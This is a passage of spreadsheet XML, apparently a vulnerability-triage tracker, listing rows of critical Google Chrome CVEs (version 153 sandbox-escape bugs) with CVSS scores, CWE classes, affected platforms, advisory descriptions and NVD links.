      <c r="S81" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87464</t>
        </is>
      </c>
    </row>
    <row r="82">
      <c r="A82" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B82" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C82" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87470</t>
        </is>
      </c>
      <c r="D82" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="E82" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F82" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G82" s="5" t="inlineStr"/>
      <c r="H82" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I82" s="5" t="inlineStr"/>
      <c r="J82" s="5" t="inlineStr"/>
      <c r="K82" s="5" t="inlineStr">
        <is>
          <t>apple:macos, google:chrome</t>
        </is>
      </c>
      <c r="L82" s="5" t="inlineStr"/>
      <c r="M82" s="5" t="inlineStr"/>
      <c r="N82" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O82" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P82" s="5" t="inlineStr"/>
      <c r="Q82" s="5" t="inlineStr">
        <is>
          <t>CWE-1284</t>
        </is>
      </c>
      <c r="R82" s="5" t="inlineStr">
        <is>
          <t>Improper quantity validation in Tint in Google Chrome on on Mac prior to 153.0.8010.36 allowed a remote attacker to potentially execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S82" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87470</t>
        </is>
      </c>
    </row>
    <row r="83">
      <c r="A83" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B83" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C83" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87474</t>
        </is>
      </c>
      <c r="D83" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="E83" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F83" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G83" s="5" t="inlineStr"/>
      <c r="H83" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I83" s="5" t="inlineStr"/>
      <c r="J83" s="5" t="inlineStr"/>
      <c r="K83" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L83" s="5" t="inlineStr"/>
      <c r="M83" s="5" t="inlineStr"/>
      <c r="N83" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O83" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P83" s="5" t="inlineStr"/>
      <c r="Q83" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R83" s="5" t="inlineStr">
        <is>
          <t>Use after free in Payments in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to potentially execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="S83" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87474</t>
        </is>
      </c>
    </row>
    <row r="84">
      <c r="A84" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B84" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C84" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87488</t>
        </is>
      </c>
      <c r="D84" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="E84" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F84" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G84" s="5" t="inlineStr"/>
      <c r="H84" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I84" s="5" t="inlineStr"/>
      <c r="J84" s="5" t="inlineStr"/>
      <c r="K84" s="5" t="inlineStr">
        <is>
          <t>google:android, google:chrome</t>
        </is>
      </c>
      <c r="L84" s="5" t="inlineStr"/>
      <c r="M84" s="5" t="inlineStr"/>
      <c r="N84" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O84" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P84" s="5" t="inlineStr"/>
      <c r="Q84" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R84" s="5" t="inlineStr">
        <is>
          <t>Use after free in WebGL in Google Chrome on on Android prior to 153.0.8010.36 allowed a remote attacker to execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: Critical)</t>
        </is>
      </c>
      <c r="S84" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87488</t>
        </is>
      </c>
    </row>
    <row r="85">
      <c r="A85" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B85" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C85" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87492</t>
        </is>
      </c>
      <c r="D85" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="E85" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F85" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G85" s="5" t="inlineStr"/>
      <c r="H85" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I85" s="5" t="inlineStr"/>
      <c r="J85" s="5" t="inlineStr"/>
      <c r="K85" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L85" s="5" t="inlineStr"/>
      <c r="M85" s="5" t="inlineStr"/>
      <c r="N85" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O85" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P85" s="5" t="inlineStr"/>
      <c r="Q85" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R85" s="5" t="inlineStr">
        <is>
          <t>Incorrect authorization in DevTools in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to potentially execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="S85" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87492</t>
        </is>
      </c>
    </row>
    <row r="86">
      <c r="A86" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B86" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C86" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87494</t>
        </is>
      </c>
      <c r="D86" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="E86" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F86" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G86" s="5" t="inlineStr"/>
      <c r="H86" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I86" s="5" t="inlineStr"/>
      <c r="J86" s="5" t="inlineStr"/>
      <c r="K86" s="5" t="inlineStr">
        <is>
          <t>google:chrome, microsoft:windows</t>
        </is>
      </c>
      <c r="L86" s="5" t="inlineStr"/>
      <c r="M86" s="5" t="inlineStr"/>
      <c r="N86" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O86" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P86" s="5" t="inlineStr"/>
      <c r="Q86" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R86" s="5" t="inlineStr">
        <is>
          <t>Use after free in Browser in Google Chrome on on Windows prior to 153.0.8010.36 allowed a remote attacker leveraging social engineering to execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S86" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87494</t>
        </is>
      </c>
    </row>
    <row r="87">
      <c r="A87" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B87" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C87" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87500</t>
        </is>
      </c>
      <c r="D87" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="E87" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F87" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G87" s="5" t="inlineStr"/>
      <c r="H87" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I87" s="5" t="inlineStr"/>
      <c r="J87" s="5" t="inlineStr"/>
      <c r="K87" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L87" s="5" t="inlineStr"/>
      <c r="M87" s="5" t="inlineStr"/>
      <c r="N87" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O87" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P87" s="5" t="inlineStr"/>
      <c r="Q87" s="5" t="inlineStr">
        <is>
          <t>CWE-129</t>
        </is>
      </c>
      <c r="R87" s="5" t="inlineStr">
        <is>
          <t>Improper validation of array index in ANGLE in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to potentially execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="S87" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87500</t>
        </is>
      </c>
    </row>
    <row r="88">
      <c r="A88" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B88" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C88" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87504</t>
        </is>
      </c>
      <c r="D88" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="E88" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F88" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G88" s="5" t="inlineStr"/>
      <c r="H88" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I88" s="5" t="inlineStr"/>
      <c r="J88" s="5" t="inlineStr"/>
      <c r="K88" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L88" s="5" t="inlineStr"/>
      <c r="M88" s="5" t="inlineStr"/>
      <c r="N88" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O88" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P88" s="5" t="inlineStr"/>
      <c r="Q88" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R88" s="5" t="inlineStr">
        <is>
          <t>Use after free in Core in Google Chrome prior to 153.0.8010.36 allowed a remote attacker leveraging social engineering to execute arbitrary code outside the sandbox via a crafted Chrome extension. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S88" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87504</t>
        </is>
      </c>
    </row>
    <row r="89">
      <c r="A89" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B89" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C89" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87512</t>
        </is>
      </c>
      <c r="D89" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="E89" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F89" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G89" s="5" t="inlineStr"/>
      <c r="H89" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I89" s="5" t="inlineStr"/>
      <c r="J89" s="5" t="inlineStr"/>
      <c r="K89" s="5" t="inlineStr">
        <is>
          <t>google:chrome, microsoft:windows</t>
        </is>
      </c>
      <c r="L89" s="5" t="inlineStr"/>
      <c r="M89" s="5" t="inlineStr"/>
      <c r="N89" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O89" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P89" s="5" t="inlineStr"/>
      <c r="Q89" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R89" s="5" t="inlineStr">
        <is>
          <t>Use after free in ANGLE in Google Chrome on on Windows prior to 153.0.8010.36 allowed a remote attacker to execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="S89" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87512</t>
        </is>
      </c>
    </row>
    <row r="90">
      <c r="A90" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B90" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C90" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87520</t>
        </is>
      </c>
      <c r="D90" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="E90" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F90" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G90" s="5" t="inlineStr"/>
      <c r="H90" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I90" s="5" t="inlineStr"/>
      <c r="J90" s="5" t="inlineStr"/>
      <c r="K90" s="5" t="inlineStr">
        <is>
          <t>google:android, google:chrome</t>
        </is>
      </c>
      <c r="L90" s="5" t="inlineStr"/>
      <c r="M90" s="5" t="inlineStr"/>
      <c r="N90" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O90" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P90" s="5" t="inlineStr"/>
      <c r="Q90" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R90" s="5" t="inlineStr">
        <is>
          <t>Use after free in Dawn in Google Chrome on on Android prior to 153.0.8010.36 allowed a remote attacker to execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="S90" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87520</t>
        </is>
      </c>
    </row>
    <row r="91">
      <c r="A91" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B91" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C91" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87526</t>
        </is>
      </c>
      <c r="D91" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="E91" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F91" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G91" s="5" t="inlineStr"/>
      <c r="H91" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I91" s="5" t="inlineStr"/>
      <c r="J91" s="5" t="inlineStr"/>
      <c r="K91" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L91" s="5" t="inlineStr"/>
      <c r="M91" s="5" t="inlineStr"/>
      <c r="N91" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O91" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P91" s="5" t="inlineStr"/>
      <c r="Q91" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R91" s="5" t="inlineStr">
        <is>
          <t>Use after free in Passwords in Google Chrome prior to 153.0.8010.36 allowed a remote attacker leveraging social engineering to potentially execute arbitrary code outside the sandbox via UI Interaction. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S91" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87526</t>
        </is>
      </c>
    </row>
    <row r="92">
      <c r="A92" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B92" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C92" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87527</t>
        </is>
      </c>
      <c r="D92" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="E92" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F92" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G92" s="5" t="inlineStr"/>
      <c r="H92" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I92" s="5" t="inlineStr"/>
      <c r="J92" s="5" t="inlineStr"/>
      <c r="K92" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L92" s="5" t="inlineStr"/>
      <c r="M92" s="5" t="inlineStr"/>
      <c r="N92" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O92" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P92" s="5" t="inlineStr"/>
      <c r="Q92" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R92" s="5" t="inlineStr">
        <is>
          <t>Buffer overflow in WebGL in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: Critical)</t>
        </is>
      </c>
      <c r="S92" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87527</t>
        </is>
      </c>
    </row>
    <row r="93">
      <c r="A93" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B93" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C93" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87528</t>
        </is>
      </c>
      <c r="D93" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="E93" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F93" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G93" s="5" t="inlineStr"/>
      <c r="H93" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I93" s="5" t="inlineStr"/>
      <c r="J93" s="5" t="inlineStr"/>
      <c r="K93" s="5" t="inlineStr">
        <is>
          <t>google:chrome, microsoft:windows</t>
        </is>
      </c>
      <c r="L93" s="5" t="inlineStr"/>
      <c r="M93" s="5" t="inlineStr"/>
      <c r="N93" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O93" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P93" s="5" t="inlineStr"/>
      <c r="Q93" s="5" t="inlineStr">
        <is>
          <t>CWE-843</t>
        </is>
      </c>
      <c r="R93" s="5" t="inlineStr">
        <is>
          <t>Type confusion in Rust in Google Chrome on on Windows prior to 153.0.8010.36 allowed a remote attacker to potentially execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S93" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87528</t>
        </is>
      </c>
    </row>
    <row r="94">
      <c r="A94" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B94" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C94" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87529</t>
        </is>
      </c>
      <c r="D94" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="E94" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F94" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G94" s="5" t="inlineStr"/>
      <c r="H94" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I94" s="5" t="inlineStr"/>
      <c r="J94" s="5" t="inlineStr"/>
      <c r="K94" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L94" s="5" t="inlineStr"/>
      <c r="M94" s="5" t="inlineStr"/>
      <c r="N94" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O94" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P94" s="5" t="inlineStr"/>
      <c r="Q94" s="5" t="inlineStr">
        <is>
          <t>CWE-197</t>
        </is>
      </c>
      <c r="R94" s="5" t="inlineStr">
        <is>
          <t>Numeric truncation error in Media in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to potentially execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S94" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87529</t>
        </is>
      </c>
    </row>
    <row r="95">
      <c r="A95" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B95" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C95" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87547</t>
        </is>
      </c>
      <c r="D95" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="E95" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F95" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G95" s="5" t="inlineStr"/>
      <c r="H95" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I95" s="5" t="inlineStr"/>
      <c r="J95" s="5" t="inlineStr"/>
      <c r="K95" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L95" s="5" t="inlineStr"/>
      <c r="M95" s="5" t="inlineStr"/>
      <c r="N95" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O95" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P95" s="5" t="inlineStr"/>
      <c r="Q95" s="5" t="inlineStr">
        <is>
          <t>CWE-706</t>
        </is>
      </c>
      <c r="R95" s="5" t="inlineStr">
        <is>
          <t>Incorrect reference resolution in FileSystem in Google Chrome prior to 153.0.8010.36 allowed a remote attacker leveraging social engineering to potentially execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S95" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87547</t>
        </is>
      </c>
    </row>
    <row r="96">
      <c r="A96" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B96" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C96" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87558</t>
        </is>
      </c>
      <c r="D96" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="E96" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F96" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G96" s="5" t="inlineStr"/>
      <c r="H96" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I96" s="5" t="inlineStr"/>
      <c r="J96" s="5" t="inlineStr"/>
      <c r="K96" s="5" t="inlineStr">
        <is>
          <t>apple:macos, google:chrome</t>
        </is>
      </c>
      <c r="L96" s="5" t="inlineStr"/>
      <c r="M96" s="5" t="inlineStr"/>
      <c r="N96" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O96" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P96" s="5" t="inlineStr"/>
      <c r="Q96" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R96" s="5" t="inlineStr">
        <is>
          <t>Use after free in Payments in Google Chrome on on Mac prior to 153.0.8010.36 allowed a remote attacker to execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="S96" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87558</t>
        </is>
      </c>
    </row>
    <row r="97">
      <c r="A97" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B97" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C97" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87581</t>
        </is>
      </c>
      <c r="D97" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="E97" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F97" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G97" s="5" t="inlineStr"/>
      <c r="H97" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I97" s="5" t="inlineStr"/>
      <c r="J97" s="5" t="inlineStr"/>
      <c r="K97" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L97" s="5" t="inlineStr"/>
      <c r="M97" s="5" t="inlineStr"/>
      <c r="N97" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O97" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P97" s="5" t="inlineStr"/>
      <c r="Q97" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R97" s="5" t="inlineStr">
        <is>
          <t>Use after free in Payments in Google Chrome prior to 153.0.8010.36 allowed a remote attacker leveraging social engineering to potentially execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="S97" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87581</t>
        </is>
      </c>
    </row>
    <row r="98">
      <c r="A98" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B98" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C98" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87607</t>
        </is>
      </c>
      <c r="D98" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="E98" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F98" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G98" s="5" t="inlineStr"/>
      <c r="H98" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I98" s="5" t="inlineStr"/>
      <c r="J98" s="5" t="inlineStr"/>
      <c r="K98" s="5" t="inlineStr">
        <is>
          <t>apple:macos, google:chrome</t>
        </is>
      </c>
      <c r="L98" s="5" t="inlineStr"/>
      <c r="M98" s="5" t="inlineStr"/>
      <c r="N98" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O98" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P98" s="5" t="inlineStr"/>
      <c r="Q98" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R98" s="5" t="inlineStr">
        <is>
          <t>Use after free in Device in Google Chrome on on Mac prior to 153.0.8010.36 allowed a remote attacker to potentially execute arbitrary code outside the sandbox via a crafted HTML page. (Chromium security severity: High)</t>
        </is>
